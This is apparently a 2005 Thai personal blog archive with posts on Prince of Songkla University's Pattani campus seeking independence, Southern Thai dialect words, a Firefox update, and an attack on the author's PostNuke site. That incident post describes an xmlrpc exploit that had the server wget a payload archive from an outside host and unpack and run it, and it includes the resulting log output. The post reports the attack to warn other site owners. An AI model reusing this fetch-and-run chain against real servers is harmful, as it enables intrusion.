MrChoke.Org

บันทึกสีดำ

Month: July, 2005

ม.อ. ปัตตานีกับการแยกตัวเป็นเอกเทศ

เมื่อวานผ่านไปเห็นเว็บของ ม.อ.ปัตตานี http://www.kaekae.pn.psu.ac.th/psupattani/index.php เนื้อหาสาระในเว็บนี้จะพูดถึงการเตรียมตัวที่จะแยก มหาวิทยาลัยเป็นมหาวิทยาลัยเต็มรูป ไม่ขึ้นกับ มหาวิทยาลัยสงขลานครินทร์ เรื่องราวเหล่านี้ไม่ใช่เรื่องใหม่เลย ตั้งแต่ผมเข้าศึกษาที่ ม.อ. หาดใหญ่ผมก็ได้ยินเรื่องราวเหล่านี้มาตลอด รวมไปถึงความไม่ลงรอยทางความคิดทั้ง ผู้บริหาร และ นักศึกษาของวิทยาเขตหาดใหญ่ และ วิทยาเขตปัตตานี เมื่อก่อนมีกลุ่มข่าวภายใน ม.อ. เองมีการพูดคุยกันและบางครั้งมีการพูดคุยกันอย่างดุดันเผ็ดร้อนของคนที่ความ คิดไม่ตรงกัน การดำเนินการต่างๆ ก็ยังคงดำเนินการต่อมาจนถึงทุกวันนี้
โดยความรู้สึกส่วนตัวแล้วผมไม่เห็นด้วยกับการแยกตัวของ ม.อ.ปัตตานีเท่าไรนักทั้งนี้เป็นแค่ความรู้สึกที่ไม่รู้ถึงรายละเอียดเชิงลึ กนั้นเอง ถึงแม้ผมจะเป็นศิษย์เก่าจาก ม.อ. ก็ตามใช่ว่าเรื่องราวเหล่านี้จะเป็นที่รู้กันในวงนักศึกษา ข้อมูลต่างๆ ไม่มีการเผยแพร่เท่าไรนักในขณะนั้น รู้แต่เพียงมีนักศึกษาบางกลุ่มที่ มองหน้ากันไม่ค่อยได้ก็มีส่วนน้อย หลายต่อหลายครั้งที่ได้ยินคำพูดในเชิงน้อยเนื้อต่ำใจของเพื่อนนักศึกษา ม.อ.ปัตตานีประมาณว่าเป็นลูกเมียน้อย ได้อะไรทีหลังเสมอ หรือโอกาสรับรู้ข่าวสารก็มีน้อยกว่า วิทยาเขตหาดใหญ่ งบประมาณก็ไม่ได้รับความเป็นธรรม ชื่อเสียงก็วิทยาเขตแม่รับไปทั้งหมดเป็นต้น..
เมื่อเข้ามาอ่านข้อมูลในประวัติความเป็นมาแล้วจะทราบถึงเหตุผลที่ต้องการแยกตัวออกไป จากหน้า http://kaekae.pn.psu.ac.th/psupattงani/index.php?name=Content&pa=showpage&pid=1
“จ ุดเริ่มต้นของการยกฐานะวิทยาเขตปัตตานีขึ้นเป็นมหาวิทยาลัยเอกเทศหรือมหาวิท ยาลัยเต็มรูปนั้น เป็นแนวคิดที่มีมาต่อเนื่องเป็นระยะเวลากว่า 7 ปีแล้ว ด้วยเหตุผลที่หลากหลาย ไม่ว่าจะเป็นเพื่อให้สามารถดำเนินการจัดการบริหารและพัฒนามาตรฐานการจัดการเ รียนการสอนได้อย่างเป็นอิสระ สามารถขยายโอกาสทางการศึกษาให้กับคนในพื้นที่และระดับประเทศได้อย่างหลากหลา ยสาขาวิชามากขึ้น หรือการสร้างความเข้มแข็งในการมีส่วนร่วมแก้ไขปัญหาของท้องถิ่นได้อย่างเต็ม ที่”
เนื่องจากปัจจุบัน ม.อ. มีหลายวิทยาเขต และแต่ละวิทยาเขตก็จะเน้นสาขาวิชาไม่เหมือนกัน พูดง่ายๆ คือมีเฉพาะสาขาวิชาเฉพาะทางไม่ครอบคลุมทั้งหมด ซึ่งนั้นก็คือรวมไปถึงวิทยาเขตปัตตานีด้วย แต่ความแตกต่าง ของวิทยาเขตปัตตานีกับวิทยาเขต รุ่นหลังคือ วิทยาเขตปัตตานีเป็นที่กำเนิด ม.อ. ไม่ใช่ ม.อ. หาดใหญ่ แต่เมื่อย้ายการบริหารมาอยู่ที่ ม.อ. หาดใหญ่ ทำให้ทุกสิ่งทุกอย่างทุ่มมาอยู่ที่ ม.อ. หาดใหญ่ทั้งหมด สาขาวิชาก็เน้นไปทาง ศิลปกรรมศาสตร์ เป็นหลัก
ถ้าใครสนใจเรื่องนี้และมองว่าเป็นเรื่องสำคัญที่คนไทยทุกคนต้องร่วมกันแก้ไข ปัญหาก็สามารถเข้าไปอ่าน และ เสนอความคิดเห็นจะได้มีมุมมองที่กว้างขึ้น และ ม.อ.ปัตตานีไม่ได้ถูกลืม หรือ ไม่เป็นที่สนใจของคนไทย ออ อย่าลืมร่วมกันโหวตด้วยนะครับว่าคิดเห็นอย่างไร

http://www.psu.ac.th
http://www.pn.psu.ac.th
http://www.kaekae.pn.psu.ac.th/psupattani/index.php

ภาษาใต้: มาก …

คิดไว้ว่าจะรวบรวมคำที่มีความหมายว่า “มาก” ว่าจะมีสักกี่คำที่ผมรู้จัก -_-! เริ่มนับกันเลยครับ

 • กองลุย
 • กองเอ
 • กาเอ,กะเอ
 • กาลุย,กะลุย
 • กาลักกาลุย,กะลักกะลุย
 • กาโข,กะโข
 • โขลุย
 • ครัน
 • แตรกแตรก
 • จัง,จังหู
 • จังเสีย
 • จ้าน
 • เจกเจก
 • จม,จ้านจม
 • รึด,รึดๆ
 • ราสา
 • หนัดเหนียน
 • หลาย

ใครมีคำแนะนำดีๆ ช่วยแนะนำด้วยครับผม

โดนโจมตี Postnuke

ได้ยินข่าวเรื่อง bug ของ xmlrpc มาหลายวันแล้วแต่ยังไม่ได้แก้ไขวันนี้เลยเจอดีเข้าจนได้โดยได้มีมือดี จากหมายเลข IP 66.149.216.250 (Foundation For the Future) ส่งข้อมูลโดย method POST เข้ามาทาง /xmlrpc.php แล้วสั่งให้ทำการ download file ด้วย wget จาก http://dorohoi.org/insert/dh.tgz แล้วสั่งแตก tar ออกมา แต่กระบวนการนี้ไม่เสร็จโชคดีไปครับ เนื่องจากภายในบังคับผ่าน proxy ใครที่ยังไม่ได้แก้ไขก็รีบแก้นะครับก่อนจะสายเกินแก้ .. ผมอ่านเจอเขาแนะนำให้เอา xmlrpm.php ออกไปเลย พร้อมทั้ง ลบ module xmlrpc ออกไปด้วย

–16:47:36– http://dorohoi.org/insert/dh.tgz
=> `dh.tgz’
Resolving dorohoi.org… 64.92.162.194
Connecting to dorohoi.org[64.92.162.194]:80… failed: Connection timed out.
Retrying.

.
.
.

–17:49:52– http://dorohoi.org/insert/dh.tgz
(try:20) => `dh.tgz’
Connecting to dorohoi.org[64.92.162.194]:80… failed: Connection timed out.
Giving up.
tar: dh.tgz: Cannot open: No such file or directory
tar: Error is not recoverable: exiting now
tar: Child returned status 2
tar: Error exit delayed from previous errors
sh: line 0: cd: .dh: No such file or directory
sh: ./init: No such file or directory

ภาษาใต้: เต็ด..

ภาษาใต้วันนี้ขอเสนอคำว่า “เต็ด” โดยความหมายจะหมายถึง “เล็กๆ” เทียบได้กับคำว่า “เอียด” และ “ฮิต” ในภาษาใต้เช่นกัน
ตัวอย่าง
“น้องสาวนี้ตัวเท่าเต็ดอ้อร้อได้แรง” หมายถึง “น้องสาวคนนี้ตัวเล็กนิดเดียวแต่แรดจริงๆ”
“ไม้อันนี้เอียดแรงหามหมาได้ไหม้” หมายถึง “ไม้ท่อนนี้เล็กเกินไปหามไม่ไหวหรอก”
“ไอ้บาวนีตัวเท่าฮิตอย่ามาด้นกับกับพี่” หมายถึง “ไอ้หนุ่มตัวเล็กแบบนี้อย่ามายุ่งกับพี่เลย”
แล้วเจอกันใหม่ครับ

Firefox: Update 1.0.6

Firefox และ Firefox-i18n-thai ทั้งบน Samila และ Waghor ได้ทำการ update สามารถ apt เพื่อติดตั้งได้แล้วนะครับ

# apt-get update

# apt-get install firefox

# apt-get install firefox-i18n-thai

โชคดีครับ

ftp://ftp.opentle.org/pub/linux-tle/7.0/i386/TLE/SRPMS.updates/

ftp://ftp.nectec.or.th/pub/linux-distributions/Linux_TLE/7.0/i386/TLE/RPMS.updates/

ftp://ftp.opentle.org/pub/linux-tle/5.5/i386/TLE/SRPMS.updates/

ftp://ftp.nectec.or.th/pub/linux-distributions/Linux_TLE/5.5/i386/TLE/RPMS.updates/